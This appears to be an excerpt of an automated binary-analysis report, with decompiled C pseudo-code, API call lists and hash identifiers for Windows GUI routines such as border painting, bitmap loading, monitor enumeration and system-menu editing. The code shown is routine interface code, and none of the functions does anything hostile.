    						goto L14;
    					}
    					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
    					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
    						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
    							goto L13;
    						}
    						if(_v16 == 1) {
    							_t61 = 1;
    						}
    						goto L14;
    					} else {
    						goto L13;
    					}
    				}
    				 *0x47b92c = E004223DC(7, _t60,  *0x47b92c, _t64, _t65);
    				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
    				goto L14;
    			}

    APIs
    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004229C1
    • GetSystemMetrics.USER32(00000000), ref: 004229E6
    • GetSystemMetrics.USER32(00000001), ref: 004229F1
    • GetClipBox.GDI32(?,?), ref: 00422A03
    • GetDCOrgEx.GDI32(?,?), ref: 00422A10
    • OffsetRect.USER32(?,?,?), ref: 00422A29
    • IntersectRect.USER32(?,?,?), ref: 00422A3A
    • IntersectRect.USER32(?,?,?), ref: 00422A50
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
    • String ID: EnumDisplayMonitors
    • API String ID: 362875416-2491903729
    • Opcode ID: e441daebd1664fe64bdea52d5b89fd401027e91a8efdba01f915c7ad8ea11489
    • Instruction ID: 980d00046ea4793bde311c4f4de0b388f028731dcfa80c61d925b726898bc026
    • Opcode Fuzzy Hash: e441daebd1664fe64bdea52d5b89fd401027e91a8efdba01f915c7ad8ea11489
    • Instruction Fuzzy Hash: B2312FB2A01219AFDB10DBA59D45AFF77FCEB08300F404127FA25E2241E77899458BA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E004332C8(intOrPtr* __eax, intOrPtr __edx) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				struct HDC__* _v16;
    				struct tagRECT _v32;
    				struct tagRECT _v48;
    				void* _v64;
    				struct HDC__* _t120;
    				void* _t171;
    				intOrPtr* _t193;
    				intOrPtr* _t196;
    				intOrPtr _t205;
    				void* _t208;
    				intOrPtr _t216;
    				signed int _t234;
    				void* _t237;
    				void* _t239;
    				intOrPtr _t240;
    
    				_t237 = _t239;
    				_t240 = _t239 + 0xffffffc4;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
    					_t120 = E0043260C(_v8);
    					_push(_t120);
    					L00406874();
    					_v16 = _t120;
    					_push(_t237);
    					_push(0x43352e);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t240;
    					GetClientRect(E0043260C(_v8),  &_v32);
    					GetWindowRect(E0043260C(_v8),  &_v48);
    					MapWindowPoints(0, E0043260C(_v8),  &_v48, 2);
    					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
    					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					if( *(_v8 + 0x165) != 0) {
    						_t208 = 0;
    						if( *(_v8 + 0x163) != 0) {
    							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
    						}
    						if( *(_v8 + 0x164) != 0) {
    							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
    						}
    						_t234 = GetWindowLongA(E0043260C(_v8), 0xfffffff0);
    						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
    							_v48.left = _v48.left - _t208;
    						}
    						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
    							_v48.top = _v48.top - _t208;
    						}
    						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
    							_v48.right = _v48.right + _t208;
    						}
    						if((_t234 & 0x00200000) != 0) {
    							_t196 =  *0x479e84; // 0x47b910
    							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
    						}
    						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
    							_v48.bottom = _v48.bottom + _t208;
    						}
    						if((_t234 & 0x00100000) != 0) {
    							_t193 =  *0x479e84; // 0x47b910
    							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
    						}
    						DrawEdge(_v16,  &_v48,  *(0x479a28 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x479a38 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x479a48 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x479a58 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
    					}
    					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
    					FillRect(_v16,  &_v48, E0041D068( *((intOrPtr*)(_v8 + 0x170))));
    					_pop(_t216);
    					 *[fs:eax] = _t216;
    					_push(0x433535);
    					_push(_v16);
    					_t171 = E0043260C(_v8);
    					_push(_t171);
    					L004069B4();
    					return _t171;
    				} else {
    					 *((intOrPtr*)( *_v8 - 0x10))();
    					_t205 = E00425998(E004258B8());
    					if(_t205 != 0) {
    						_t205 = _v8;
    						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
    							_t205 = E00425EC8(E004258B8(), 0, _v8);
    						}
    					}
    					return _t205;
    				}
    			}





















    APIs
    • GetClientRect.USER32(00000000,?), ref: 0043331F
    • GetWindowRect.USER32(00000000,?), ref: 00433331
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00433347
    • OffsetRect.USER32(?,?,?), ref: 0043335C
    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0043352E), ref: 00433375
    • InflateRect.USER32(?,00000000,00000000), ref: 00433393
    • GetWindowLongA.USER32(00000000,000000F0), ref: 004333E9
    • DrawEdge.USER32(?,?,00000000,00000008), ref: 004334B5
    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004334CE
    • OffsetRect.USER32(?,?,?), ref: 004334ED
    • FillRect.USER32(?,?,00000000), ref: 00433509
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPoints
    • String ID:
    • API String ID: 1573515177-0
    • Opcode ID: dd5c2a34f4fbcdf76df79b6b7d2b8772f5761c490352404dce40c3bbbfdcd48f
    • Instruction ID: d40a58a42259eb0e890114817008824177fc0b92a19e48aa64e9657c0d1342cf
    • Opcode Fuzzy Hash: dd5c2a34f4fbcdf76df79b6b7d2b8772f5761c490352404dce40c3bbbfdcd48f
    • Instruction Fuzzy Hash: 02910671E04648AFDB01DFA9C985EEEB7F9AF09304F1480A6F514F7252C679AE40CB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E004208F0(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
    				intOrPtr _v8;
    				intOrPtr* _v12;
    				void* _v16;
    				struct HDC__* _v20;
    				char _v24;
    				intOrPtr* _v28;
    				intOrPtr _v32;
    				char _v36;
    				signed int _v37;
    				intOrPtr _v44;
    				void* _v48;
    				struct HDC__* _v52;
    				intOrPtr _v56;
    				intOrPtr* _v60;
    				intOrPtr* _v64;
    				short _v66;
    				short _v68;
    				signed short _v70;
    				signed short _v72;
    				void* _v76;
    				intOrPtr _v172;
    				char _v174;
    				intOrPtr _t150;
    				signed int _t160;
    				intOrPtr _t163;
    				void* _t166;
    				void* _t174;
    				void* _t183;
    				signed int _t188;
    				intOrPtr _t189;
    				struct HDC__* _t190;
    				struct HDC__* _t204;
    				signed int _t208;
    				signed short _t214;
    				intOrPtr _t241;
    				intOrPtr* _t245;
    				intOrPtr _t251;
    				char* _t278;
    				intOrPtr _t289;
    				intOrPtr _t290;
    				intOrPtr _t295;
    				signed int _t297;
    				signed int _t317;
    				void* _t319;
    				void* _t320;
    				signed int _t321;
    				void* _t322;
    				void* _t323;
    				void* _t324;
    				intOrPtr _t325;
    
    				_t316 = __edi;
    				_t323 = _t324;
    				_t325 = _t324 + 0xffffff54;
    				_t319 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v52 = 0;
    				_v44 = 0;
    				_v60 = 0;
    				_t278 =  &_v36;
    				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
    				_v37 = _v36 == 0xc;
    				if(_v37 != 0) {
    					_v36 = 0x28;
    				}
    				_v28 = E00402A28(_v36 + 0x40c, 4, _t278);
    				_v64 = _v28;
    				_push(_t323);
    				_push(0x420e0d);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t325;
    				_push(_t323);
    				_push(0x420de0);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t325;
    				if(_v37 == 0) {
    					 *((intOrPtr*)( *_v12 + 0xc))();
    					_t320 = _t319 - _v36;
    					_t150 =  *((intOrPtr*)(_v64 + 0x10));
    					if(_t150 != 3 && _t150 != 0) {
    						_v60 = E0040343C(1);
    						if(_a4 == 0) {
    							E00402E84( &_v174, 0xe);
    							_v174 = 0x4d42;
    							_v172 = _v36 + _t320;
    							_a4 =  &_v174;
    						}
    						 *((intOrPtr*)( *_v60 + 0x10))();
    						 *((intOrPtr*)( *_v60 + 0x10))();
    						 *((intOrPtr*)( *_v60 + 0x10))();
    						E00415D44(_v60,  *_v60, _v36 - 4, _v12, _t316, _t320, _t320, 0);
    						 *((intOrPtr*)( *_v60 + 0x14))();
    						_v12 = _v60;
    					}
    				} else {
    					 *((intOrPtr*)( *_v12 + 0xc))();
    					_t251 = _v64;
    					E00402E84(_t251, 0x28);
    					_t241 = _t251;
    					 *(_t241 + 4) = _v72 & 0x0000ffff;
    					 *(_t241 + 8) = _v70 & 0x0000ffff;
    					 *((short*)(_t241 + 0xc)) = _v68;
    					 *((short*)(_t241 + 0xe)) = _v66;
    					_t320 = _t319 - 0xc;
    				}
    				_t245 = _v64;
    				 *_t245 = _v36;
    				_v32 = _v28 + _v36;
    				if( *((short*)(_t245 + 0xc)) != 1) {
    					E0041D998();
    				}
    				if(_v36 == 0x28) {
    					_t214 =  *(_t245 + 0xe);
    					if(_t214 == 0x10 || _t214 == 0x20) {
    						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
    							E00415CD4(_v12, 0xc, _v32);
    							_v32 = _v32 + 0xc;
    							_t320 = _t320 - 0xc;
    						}
    					}
    				}
    				if( *(_t245 + 0x20) == 0) {
    					 *(_t245 + 0x20) = E0041DC1C( *(_t245 + 0xe));
    				}
    				_t317 = _v37 & 0x000000ff;
    				_t257 =  *(_t245 + 0x20) * 0;
    				E00415CD4(_v12,  *(_t245 + 0x20) * 0, _v32);
    				_t321 = _t320 -  *(_t245 + 0x20) * 0;
    				if( *(_t245 + 0x14) == 0) {
    					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
    					_t208 = E0041DC3C( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
    					asm("cdq");
    					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
    					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
    				}
    				_t160 =  *(_t245 + 0x14);
    				if(_t321 > _t160) {
    					_t321 = _t160;
    				}
    				if(_v37 != 0) {
    					_t160 = E0041DEE4(_v32);
    				}
    				_push(0);
    				L0040677C();
    				_v16 = E0041DAAC(_t160);
    				_push(_t323);
    				_push(0x420d5b);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t325;
    				_t163 =  *((intOrPtr*)(_v64 + 0x10));
    				if(_t163 == 0 || _t163 == 3) {
    					if( *0x479444 == 0) {
    						_push(0);
    						_push(0);
    						_push( &_v24);
    						_push(0);
    						_push(_v28);
    						_t166 = _v16;
    						_push(_t166);
    						L0040648C();
    						_v44 = _t166;
    						if(_v44 == 0 || _v24 == 0) {
    							if(GetLastError() != 0) {
    								E0040CA08(_t245, _t257, _t317, _t321);
    							} else {
    								E0041D998();
    							}
    						}
    						_push(_t323);
    						_push( *[fs:eax]);
    						 *[fs:eax] = _t325;
    						E00415CD4(_v12, _t321, _v24);
    						_pop(_t289);
    						 *[fs:eax] = _t289;
    						_t290 = 0x420d2a;
    						 *[fs:eax] = _t290;
    						_push(0x420d62);
    						_t174 = _v16;
    						_push(_t174);
    						_push(0);
    						L004069B4();
    						return _t174;
    					} else {
    						goto L27;
    					}
    				} else {
    					L27:
    					_v20 = 0;
    					_v24 = E00402A28(_t321, _t257, 0);
    					_push(_t323);
    					_push(0x420cc3);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t325;
    					_t263 = _t321;
    					E00415CD4(_v12, _t321, _v24);
    					_push(_v16);
    					L00406484();
    					_v20 = E0041DAAC(_v16);
    					_push(1);
    					_push(1);
    					_t183 = _v16;
    					_push(_t183);
    					L0040647C();
    					_v48 = SelectObject(_v20, _t183);
    					_v56 = 0;
    					_t188 =  *(_v64 + 0x20);
    					if(_t188 > 0) {
    						_t263 = _t188;
    						_v52 = E0041E1A8(0, _t188);
    						_push(0);
    						_push(_v52);
    						_t204 = _v20;
    						_push(_t204);
    						L004065AC();
    						_v56 = _t204;
    						_push(_v20);
    						L00406584();
    					}
    					_push(_t323);
    					_push(0x420c97);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t325;
    					_push(0);
    					_t189 = _v28;
    					_push(_t189);
    					_push(_v24);
    					_push(4);
    					_push(_t189);
    					_t190 = _v20;
    					_push(_t190);
    					L00406494();
    					_v44 = _t190;
    					if(_v44 == 0) {
    						if(GetLastError() != 0) {
    							E0040CA08(_t245, _t263, _t317, _t321);
    						} else {
    							E0041D998();
    						}
    					}
    					_pop(_t295);
    					 *[fs:eax] = _t295;
    					_push(0x420c9e);
    					if(_v56 != 0) {
    						_push(0xffffffff);
    						_push(_v56);
    						_push(_v20);
    						L004065AC();
    					}
    					return DeleteObject(SelectObject(_v20, _v48));
    				}
    			}






















































    APIs
    • 72E7AC50.USER32(00000000,?,00000000,00420E0D,?,?), ref: 00420B5A
    • SelectObject.GDI32(?,00000000), ref: 00420BDE
    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00420C97,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00420C4C
    • SelectObject.GDI32(?,?), ref: 00420C8B
    • DeleteObject.GDI32(00000000), ref: 00420C91
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Object$Select$DeleteErrorLast
    • String ID: ($BM$X"A
    • API String ID: 1836871137-2099707101
    • Opcode ID: 65ebd3c6de9f86ff2aaa0dafb7fb505163f65297c935957f7a600e9459d5bc79
    • Instruction ID: 400df8316d0022c62dda291a9a8f23d2c8e586c00b2cdd9e5bbb39fd84a375aa
    • Opcode Fuzzy Hash: 65ebd3c6de9f86ff2aaa0dafb7fb505163f65297c935957f7a600e9459d5bc79
    • Instruction Fuzzy Hash: A1D14F70A002189FDF14DFA9D885BAEBBF5EF48304F50856AE905EB396D7789840CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00430418(void* __eax, void* __ecx, struct HDC__* __edx) {
    				struct tagRECT _v44;
    				struct tagRECT _v60;
    				void* _v68;
    				int _v80;
    				int _t79;
    				void* _t134;
    				int _t135;
    				void* _t136;
    				void* _t159;
    				void* _t160;
    				void* _t161;
    				struct HDC__* _t162;
    				intOrPtr* _t163;
    
    				_t163 =  &(_v44.bottom);
    				_t134 = __ecx;
    				_t162 = __edx;
    				_t161 = __eax;
    				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
    				}
    				_t78 =  *((intOrPtr*)(_t161 + 0x198));
    				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
    					L17:
    					_t79 =  *(_t161 + 0x19c);
    					if(_t79 == 0) {
    						L27:
    						return _t79;
    					}
    					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
    					if(_t79 < 0) {
    						goto L27;
    					}
    					_v44.right = _t79 + 1;
    					_t159 = 0;
    					do {
    						_t79 = E00413E68( *(_t161 + 0x19c), _t159);
    						_t135 = _t79;
    						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
    							_v44.left = CreateSolidBrush(E0041C3A8(0xff000010));
    							E00412A34( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
    							FrameRect(_t162,  &_v44, _v44);
    							DeleteObject(_v60.right);
    							_v60.left = CreateSolidBrush(E0041C3A8(0xff000014));
    							E00412A34( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
    							FrameRect(_t162,  &_v60, _v60);
    							_t79 = DeleteObject(_v68);
    						}
    						_t159 = _t159 + 1;
    						_t75 =  &(_v44.right);
    						 *_t75 = _v44.right - 1;
    					} while ( *_t75 != 0);
    					goto L27;
    				}
    				_t160 = 0;
    				if(_t134 != 0) {
    					_t160 = E00413EC4(_t78, _t134);
    					if(_t160 < 0) {
    						_t160 = 0;
    					}
    				}
    				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
    				if(_t160 <  *_t163) {
    					do {
    						_t136 = E00413E68( *((intOrPtr*)(_t161 + 0x198)), _t160);
    						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
    							E00412A34( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
    							if(RectVisible(_t162,  &(_v44.top)) != 0) {
    								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
    									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
    								}
    								_v60.top = SaveDC(_t162);
    								E0042A894(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
    								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
    								E0042D0C4(_t136, _t162, 0xf, 0);
    								RestoreDC(_t162, _v80);
    								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
    							}
    						}
    						_t160 = _t160 + 1;
    					} while (_t160 < _v60.top);
    				}
    			}

















    APIs
    • RectVisible.GDI32(?,?), ref: 004304D1
    • SaveDC.GDI32(?), ref: 004304E7
    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043050A
    • RestoreDC.GDI32(?,?), ref: 00430525
    • CreateSolidBrush.GDI32(00000000), ref: 004305A6
    • FrameRect.USER32(?,?,?), ref: 004305D9
    • DeleteObject.GDI32(?), ref: 004305E3
    • CreateSolidBrush.GDI32(00000000), ref: 004305F3
    • FrameRect.USER32(?,?,00000000), ref: 00430626
    • DeleteObject.GDI32(00000000), ref: 00430630
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
    • String ID:
    • API String ID: 375863564-0
    • Opcode ID: 2130029f683dfaa11343a8d93295155c69f427ce61c3c954a28852ae6f49cdfb
    • Instruction ID: 76b4226a74cb8447095f001428335fd808d6ff81025d9e78c1e3b277ea1b3c7e
    • Opcode Fuzzy Hash: 2130029f683dfaa11343a8d93295155c69f427ce61c3c954a28852ae6f49cdfb
    • Instruction Fuzzy Hash: 13517E712043409BD718DF29C8D4B5B77D8AF48308F04459EEE89CB39AD639E845CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E00425EC8(void* __eax, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				struct HDC__* _v12;
    				struct tagRECT _v28;
    				struct tagRECT _v44;
    				char _v56;
    				char _v72;
    				signed char _t43;
    				struct HDC__* _t55;
    				void* _t74;
    				signed int _t77;
    				int _t78;
    				int _t79;
    				void* _t92;
    				intOrPtr _t105;
    				void* _t114;
    				void* _t117;
    				void* _t120;
    				void* _t122;
    				intOrPtr _t123;
    
    				_t120 = _t122;
    				_t123 = _t122 + 0xffffffbc;
    				_t92 = __ecx;
    				_v8 = __edx;
    				_t114 = __eax;
    				_t43 = GetWindowLongA(E0043260C(_v8), 0xffffffec);
    				if((_t43 & 0x00000002) == 0) {
    					return _t43;
    				} else {
    					GetWindowRect(E0043260C(_v8),  &_v44);
    					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
    					_t55 = E0043260C(_v8);
    					_push(_t55);
    					L00406874();
    					_v12 = _t55;
    					_push(_t120);
    					_push(0x426023);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t123;
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_t117 = _t114;
    					if(_t92 != 0) {
    						_t77 = GetWindowLongA(E0043260C(_v8), 0xfffffff0);
    						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
    							_t78 = GetSystemMetrics(2);
    							_t79 = GetSystemMetrics(3);
    							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
    							E00412A34(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							_t117 = _t117;
    							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
    						}
    					}
    					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
    					E00425B00( &_v56, 2);
    					E00425A54(_t117,  &_v56, _v12, 0,  &_v44);
    					_pop(_t105);
    					 *[fs:eax] = _t105;
    					_push(0x42602a);
    					_push(_v12);
    					_t74 = E0043260C(_v8);
    					_push(_t74);
    					L004069B4();
    					return _t74;
    				}
    			}























    APIs
    • GetWindowLongA.USER32(00000000,000000EC), ref: 00425EE3
    • GetWindowRect.USER32(00000000,?), ref: 00425EFE
    • OffsetRect.USER32(?,?,?), ref: 00425F13
    • GetWindowLongA.USER32(00000000,000000F0), ref: 00425F52
    • GetSystemMetrics.USER32(00000002), ref: 00425F67
    • GetSystemMetrics.USER32(00000003), ref: 00425F70
    • InflateRect.USER32(?,000000FE,000000FE), ref: 00425F7F
    • GetSysColorBrush.USER32(0000000F), ref: 00425FAC
    • FillRect.USER32(?,?,00000000), ref: 00425FBA
    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00426023,?,00000000,?,?,?,00000000,?), ref: 00425FDF
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffset
    • String ID:
    • API String ID: 239630386-0
    • Opcode ID: 5cfe9c1719cad97590ea08ab6666c7d33f48a260923e04fd4c01c46f56bcbc9f
    • Instruction ID: e53a65903ccee42e5f6fcae7e18b5d5aa6b4d4c014f47d30bc0a516c324194aa
    • Opcode Fuzzy Hash: 5cfe9c1719cad97590ea08ab6666c7d33f48a260923e04fd4c01c46f56bcbc9f
    • Instruction Fuzzy Hash: B1415172A05118AFCB00EBA9DD42EDFB7BDEF49314F514126F905F7282CA799E008768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00446BA0(intOrPtr _a4) {
    				intOrPtr _t27;
    				struct HMENU__* _t48;
    
    				_t27 =  *((intOrPtr*)(_a4 - 4));
    				if( *((char*)(_t27 + 0x229)) != 0) {
    					_t27 =  *((intOrPtr*)(_a4 - 4));
    					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
    						_t27 =  *((intOrPtr*)(_a4 - 4));
    						if( *((char*)(_t27 + 0x22f)) != 1) {
    							_t48 = GetSystemMenu(E0043260C( *((intOrPtr*)(_a4 - 4))), 0);
    							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
    								DeleteMenu(_t48, 0xf130, 0);
    								DeleteMenu(_t48, 7, 0x400);
    								DeleteMenu(_t48, 5, 0x400);
    								DeleteMenu(_t48, 0xf030, 0);
    								DeleteMenu(_t48, 0xf020, 0);
    								DeleteMenu(_t48, 0xf000, 0);
    								return DeleteMenu(_t48, 0xf120, 0);
    							}
    							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
    								EnableMenuItem(_t48, 0xf020, 1);
    							}
    							_t27 =  *((intOrPtr*)(_a4 - 4));
    							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
    								return EnableMenuItem(_t48, 0xf030, 1);
    							}
    						}
    					}
    				}
    				return _t27;
    			}






    APIs
    • GetSystemMenu.USER32(00000000,00000000), ref: 00446BEB
    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00446C09
    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C16
    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C23
    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446C30
    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00446C3D
    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00446C4A
    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00446C57
    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00446C75
    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00446C91
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
